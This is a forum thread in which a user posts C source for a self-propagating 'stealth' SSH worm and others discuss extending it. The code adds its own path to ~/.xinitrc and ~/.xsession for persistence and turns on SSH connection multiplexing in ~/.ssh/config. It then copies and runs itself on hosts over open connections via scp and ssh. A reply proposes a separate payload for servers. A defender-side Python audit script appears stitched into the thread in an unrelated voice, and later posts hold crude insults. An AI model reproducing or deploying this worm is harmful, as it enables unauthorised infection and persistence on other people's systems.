02-20-2010, 05:34 PM
|
#1
|
Grand Duke
|
"Stealth" SSH worm PoC
I wrote a "stealth" ssh worm; it should be fully undetectable from IDSs because it doesn't try to brute-force the password. Instead, it enables SSH multiplexing on the infected hosts and listens for an ssh connection to be made. Then it copies itself with scp and executes itself on the server. Unfortunately, sshd can't execute commands on the client (AFAIK), so it can only spread if the infected machine acts as a client, but only servers can get infected.
Code:
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <dirent.h>
char fileLoc[] = "~/.opensshworm"; //default location to store worm
int autostart() { //only works with X
FILE *file;
int len, i;
char *buf, filename[2][12] = {"~/.xinitrc", "~/.xsession"};
for(i=0; i<2; i++) {
file = fopen(filename[i], "a+");
if ( file == NULL ) return 0;
fseek(file, 0, SEEK_END);
len = ftell(file) + 1; //get file length
buf = (char *)malloc(len);
rewind(file);
fread(buf, 1, len, file);
if (strstr(buf, fileLoc) != NULL) {
free(buf);
continue; //already there!
}
free(buf);
fseek(file, 0, SEEK_END);
fwrite("\n", 1, 1, file);
fwrite(fileLoc, 1, strlen(fileLoc), file);
fclose(file);
}
return 1;
}
int setupSSH() {
FILE *file;
int len;
char *ptr[5], *buf,
t[] = "\nHost *\n ControlMaster auto\n ControlPath ~/.ssh/master-\%r@\%h:\%p\n";
file = fopen("~/.ssh/config", "a+");
if ( file == NULL ) return 0;
fseek(file, 0, SEEK_END);
len = ftell(file) + 1; //get file length
buf = (char *)malloc(len);
rewind(file);
fread(buf, 1, len, file);
ptr[0] = strstr(buf, "Host *");
if (ptr[0] != NULL) {
ptr[1] = strstr(ptr[0]+4, "Host");
ptr[2] = strstr(buf, "ControlMaster auto");
if ( (ptr[2] > ptr[0]) && ( (ptr[2] < ptr[1]) | (ptr[1] == NULL)) ) { //already exists
free(buf);
return 1;
}
}
fseek(file, 0, SEEK_END);
fwrite(t, 1, strlen(t), file);
fclose(file);
free(buf);
return 1;
}
int main(void) {
if (autostart() == 0) return 0;
if (setupSSH() == 0) return 0;
DIR *ssh;
struct dirent *dir;
char *ptr, host[64], cmd[256];
ssh = opendir(".ssh");
if (ssh == NULL) {
printf("error opening dir\n%i\n",errno);
return 0;
}
while(1) {
dir = readdir(ssh);
if (dir == NULL) { //if we checked all files, start over
rewinddir(ssh);
sleep(10);
continue;
}
if (strncmp(dir->d_name, "master-", 7) == 0 ) {
//ssh connection open, lets spread
ptr = strchr(dir->d_name, '@');
strcpy(host, ptr+1);
ptr = strchr(host, ':');
*ptr = 0;
sprintf(cmd, "scp %s %s:%s && ssh %s %s &", fileLoc, host, fileLoc, host, fileLoc);
system(cmd);
}
}
closedir(ssh);
return 1;
}
Last edited by Fractals; 02-25-2010 at 12:06 PM.
Reason: autostart() now edits .xsession too
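A defender-side check for the two changes the post above describes: a `Host *` block that turns on `ControlMaster auto` in `~/.ssh/config`, and a hidden-file entry appended to `.xinitrc` / `.xsession`. This is an added example, not part of the original post; the function names and the sample file contents are constructed for illustration.

```python
import re

SHARING = {"yes", "auto", "ask", "autoask"}  # ControlMaster values that share a connection
LINE = re.compile(r"\s*(\w+)(?:\s*=\s*|\s+)(.*?)\s*$")
STARTUP_CMD = re.compile(r"\s*(?:exec\s+)?(?:~|\$HOME|\$\{HOME\})/\.\S+")

def audit_ssh_config(text):
    """Flag blocks that enable connection sharing for wildcard host patterns."""
    findings = []
    block = {"line": 0, "patterns": ["*"], "opts": {}}  # options before any Host apply to all

    def close(b):
        mode = b["opts"].get("controlmaster", "no")
        if mode in SHARING and any("*" in p or "?" in p for p in b["patterns"]):
            findings.append({"line": b["line"], "patterns": b["patterns"],
                             "controlmaster": mode,
                             "controlpath": b["opts"].get("controlpath")})

    for n, raw in enumerate(text.splitlines(), 1):
        m = LINE.match(raw)
        if raw.lstrip().startswith("#") or not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip('"')
        if key in ("host", "match"):
            close(block)
            pats = val.split() if key == "host" else (["*"] if val.lower() == "all" else [])
            block = {"line": n, "patterns": pats, "opts": {}}
        else:  # the first value seen in a block wins, as in ssh itself
            block["opts"].setdefault(key, val.lower() if key == "controlmaster" else val)
    close(block)
    return findings

def audit_startup(text):
    """Return (line number, line) for X startup entries whose command is a hidden file in $HOME."""
    return [(n, l.strip()) for n, l in enumerate(text.splitlines(), 1) if STARTUP_CMD.match(l)]

# Constructed sample inputs (not taken from a real host).
SAMPLE_CONFIG = """\
Host build.example.org
    ControlMaster no

Host *
 ControlMaster auto
 ControlPath ~/.ssh/master-%r@%h:%p
"""
SAMPLE_XINITRC = "xrdb -merge ~/.Xresources\n~/.opensshworm\nexec i3\n"

if __name__ == "__main__":
    print(audit_ssh_config(SAMPLE_CONFIG), audit_startup(SAMPLE_XINITRC))
```

ssh uses the first value it obtains for each option, so read a finding's line number against any earlier block that already sets `ControlMaster`.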
|
|
|
02-25-2010, 06:29 AM
|
#2
|
Wealthy Merchant
|
Re: Hai
Quote:
Originally Posted by Fractals
it can only spread if the infected machine acts as a client, but only servers can get infected.
|
Maybe you can add a routine that checks if sshd is running (and therefore assume it's a server); if it does, you can make your program copy and run a different payload.
Also, a client that does not have an X server will be impervious to it, right?
__________________
Bai
|
|
|
02-25-2010, 11:55 AM
|
#3
|
Grand Duke
|
Re: "Stealth" SSH worm PoC
I don't know of any vulnerabilities going the other way, but I'm kinda bored right now so I'll look into it. You're right about X, I should change my comments. xinitrc gets called by startx. I should also add it to .xsession, because sometimes it is called instead of xinitrc.
|
|
|
02-25-2010, 12:34 PM
|
#4
|
Grand Duke
|
Re: "Stealth" SSH worm PoC
I can't find any way to execute commands on the client. There might be some kind of buffer overflow, but then this program would get a lot bigger because it would have to send data pretending to be sshd. I like its simplicity (read: I'm lazy).
It's kinda sad how slow this forum is. I wonder if there's any way we can increase traffic? I guess there's just not that many coders on zoklet...
|
|
|
10-26-2011, 12:34 AM
|
#5
|
Peasant
|
Re: "Stealth" SSH worm PoC
Eh, everyone just hangs out in the networking forums more. Also, zoklet isn't filled with coders. If it was promoted more I'm sure you would have had multiple responses to this.
__________________
RIP Totse May 24, 1989---January 17, 2009
|
|
|
04-09-2013, 11:01 AM
|
#6
|
Mud Farmer
|
Re: "Stealth" SSH worm PoC
Recently I have seen a blog post on an SSH worm. SSH worm based on Python code - scary code and worm, have a look:
http://hackoftheday.securitytube.net...ng-python.html
On that blog there is one video on the SSH worm.
|
|
|
04-09-2013, 11:09 AM
|
#7
|
Banned
|
Re: "Stealth" SSH worm PoC
Fucking mud farmers.
|
|
|
04-09-2013, 11:11 AM
|
#8
|
Duke
|
Re: "Stealth" SSH worm PoC
Quote:
Originally Posted by Zok Jr.
Fucking mud farmers.
|
Fucking snitches.
|
|
|
04-09-2013, 11:23 AM
|
#9
|
Banned
|
Re: "Stealth" SSH worm PoC
Quote:
Originally Posted by Ph0x
Fucking snitches.
|
Alright, you know what? I'm gonna let you suck my dick, just this once, then leave me the fuck alone.
|
|
|
 |